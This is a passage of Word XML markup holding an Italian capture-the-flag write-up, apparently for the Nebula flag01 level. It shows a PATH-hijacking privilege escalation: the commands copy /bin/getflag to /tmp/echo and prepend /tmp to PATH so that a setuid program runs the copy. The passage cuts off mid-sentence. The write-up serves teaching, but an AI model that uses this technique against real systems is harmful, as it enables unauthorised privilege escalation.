          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">env </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">esegue un programma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">in un ambiente specifico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è presente sia come interno (builtin) di BASH, sia come comando esterno.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando echo stampa i suoi argomentisu STDOUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Esegue il comando esterno </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, che stampa su terminale la stringa “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">and now what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Domanda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è possibile iniettare qualcosa al posto di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">? Ad esempio, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="737"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Soluzione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">L'unica possibilità rimasta per fare injection di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> è quella di modificare in modo consono l'ambiente di shell ereditato dal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">The variable environ points to an array of pointers to strings called the "environment"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="735"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PATH: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="735"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">The sequence of directory prefixes that sh(1) and many other programs apply in searching for a file known by an incomplete pathname. The prefixes are separated by “ : “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">copiamo il binario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> nella directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">perché leggibile e scrivibile da tutti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">) e la chiamiamo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, dopo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> alteriamo il percorso di ricerca in modo da anticipare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cp   /bin/getflag   /tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:eastAsia="Arial" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo le modifiche si lancia il programma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">env </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">prova a caricare il file eseguibile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">non ha percorso, pertanto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">usa i percorsi di ricerca per individuare un percorso assoluto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">sh individua</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> come primo candidato all'esecuzione e lo esegue con i privilegi di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
